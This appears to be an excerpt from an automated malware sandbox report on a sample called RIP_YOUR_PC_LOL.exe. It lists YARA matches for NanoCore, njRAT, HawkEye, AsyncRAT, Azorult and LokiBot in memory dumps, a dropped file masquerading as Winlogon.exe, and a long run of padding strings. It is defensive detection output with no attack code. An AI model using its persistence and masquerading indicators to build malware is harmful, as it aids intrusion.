                    Source: 00000009.00000000.416456851.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000009.00000000.416456851.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000009.00000002.700831183.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000009.00000002.700831183.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000008.00000002.449565052.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000000.00000003.388952115.00000000059C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 0000002A.00000000.507357595.0000000000FB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000011.00000000.445953483.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000011.00000002.701265514.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 0000003B.00000000.627731740.00000000007A2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 00000011.00000003.646152049.0000000001338000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000024.00000000.475797127.0000000000572000.00000002.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000024.00000000.475797127.0000000000572000.00000002.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000006.00000002.701971433.0000000001354000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0000001C.00000002.567040014.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000019.00000003.459495184.0000000000673000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000002E.00000000.548907669.0000000000722000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000011.00000000.445251023.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 0000002E.00000002.610238464.0000000000722000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000002A.00000002.552899490.0000000000FB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000005.00000002.706080641.00000000036DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000000.00000002.693319449.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 00000000.00000002.693319449.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 00000006.00000000.405813841.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 00000008.00000000.410285813.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000005.00000002.712472379.0000000007710000.00000004.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 00000005.00000000.394040229.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000005.00000000.394040229.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000008.00000000.408615715.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000011.00000000.447375879.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000006.00000000.394727625.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 00000005.00000000.394636472.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000005.00000000.394636472.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000026.00000000.491059532.0000000000272000.00000002.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000026.00000000.491059532.0000000000272000.00000002.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000006.00000000.399704980.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 00000024.00000002.629223400.0000000000572000.00000002.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000024.00000002.629223400.0000000000572000.00000002.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000006.00000002.703770994.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000009.00000000.415266906.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000009.00000000.415266906.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000019.00000003.459275166.0000000000698000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000019.00000003.458681148.000000000067C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000000.00000002.502131214.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000000.00000002.502131214.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.579383399.0000000004081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000000.00000003.386628983.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 0000001C.00000002.514866763.0000000000922000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 0000001C.00000002.514866763.0000000000922000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000000.00000001.375725825.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000000.00000001.375725825.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000004.00000002.546334194.0000000004474000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000004.00000002.546334194.0000000004474000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 00000004.00000002.546334194.0000000004474000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000011.00000000.446671445.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000009.00000002.708577022.0000000005870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000009.00000002.708577022.0000000005870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 00000009.00000002.708577022.0000000005870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 00000008.00000000.409570794.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 00000019.00000003.458183685.0000000000660000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: C:\Users\user\AppData\Roaming\22.exeFile created: C:\Windows\Help\Winlogon.exe
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeCode function: String function: 00F5BA9D appears 35 times
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.367521899.0000000000E31000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamefreeeim.exe vs RIP_YOUR_PC_LOL.exe
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamereiudxamcsyuasdx.exePADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDIN